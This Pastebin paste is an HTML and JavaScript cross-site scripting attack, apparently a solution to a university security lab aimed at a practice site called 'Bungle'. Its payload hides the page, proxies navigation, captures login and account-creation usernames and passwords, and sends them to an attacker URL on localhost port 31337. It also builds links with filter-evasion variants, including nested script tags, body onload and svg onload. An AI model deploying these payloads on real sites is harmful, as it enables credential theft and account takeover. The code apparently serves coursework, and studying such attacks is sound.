Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(attacker) {
- var target = "http://trurl.cs.illinois.edu/";
- function spy_get(spy_url) {
- $.ajax({
- url: spy_url,
- type: "GET",
- timeout: 1
- });
- }
- function log(data) {
- console.log(attacker + "?" + $.param(data));
- spy_get(attacker + "?" + $.param(data));
- }
- function log_nav(dest) {
- if (getUser() == null) {
- log({event: "nav", url: target + dest});
- } else {
- log({event: "nav", user: getUser(), url: target + dest});
- }
- }
- function logLogout() {
- log({event: "logout", user: getUser()});
- log({event: "nav", url: target});
- }
- function logLogin(username, password) {
- log({event: "login", user: username, pass: password});
- log({event: "nav", user: username, url: target});
- }
- function logCreateAccount(username, password) {
- log({event: "login", user: username, pass: password});
- log({event: "nav", user: username, url: target});
- }
- function getUser() {
- var username;
- if ($("#logged-in-user").length != 0) {
- username = $("#logged-in-user").text();
- } else {
- username = null;
- }
- return username;
- }
- function proxy(href) {
- history.pushState(null, null, href);
- $(window).on("popstate", function(e) {
- e.preventDefault();
- proxy("." + location.pathname + window.location.search);
- });
- $("html").load(href, function(){
- $("html").show();
- $("#bungle-lnk, #search-again-btn").click(function(e) {
- e.preventDefault();
- log_nav("");
- proxy("./");
- });
- $("#search-btn").click(function(e) {
- e.preventDefault();
- var search = $("#query").val();
- log_nav("search?q=" + search);
- proxy("./search?q=" + search);
- });
- $(".history-item").click(function(e) {
- var url = $(this).attr("href");
- e.preventDefault();
- log_nav(url);
- proxy(url);
- });
- $("#log-in-btn").click(function(e) {
- e.preventDefault();
- var username = $("#username").val();
- var userpass = $("#userpass").val();
- logLogin(username, userpass);
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/login",
- dataType: "text",
- data: {
- username: username,
- password: userpass
- },
- success: function() {
- proxy("./");
- }
- });
- });
- $("#new-account-btn").click(function(e) {
- e.preventDefault();
- var username = $("#username").val();
- var userpass = $("#userpass").val();
- logCreateAccount(username, userpass);
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/create",
- dataType: "text",
- data: {
- username: username,
- password: userpass
- },
- success: function() {
- logLogin(username, userpass);
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/login",
- dataType: "text",
- data: {
- username: username,
- password: userpass
- },
- success: function(){
- proxy("./");
- }
- });
- }
- });
- });
- $("#log-out-btn").click(function(e) {
- e.preventDefault();
- logLogout();
- $.ajax({
- type: "POST",
- url: "http://trurl.cs.illinois.edu/logout",
- success: function(){
- proxy("./");
- }
- });
- });
- });
- }
- $("html").hide();
- proxy("./");
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>");
- } else if (xssdefense == 1) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<scrscriptipt" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/scrscriptipt>");
- } else if (xssdefense == 2) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<body onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>");
- } else if (xssdefense == 3) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<svg/onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>");
- } else if (xssdefense == 4) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + "><" +"/script>");
- }
- }
- var xssdefense = 4;
- var target = "http://trurl.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement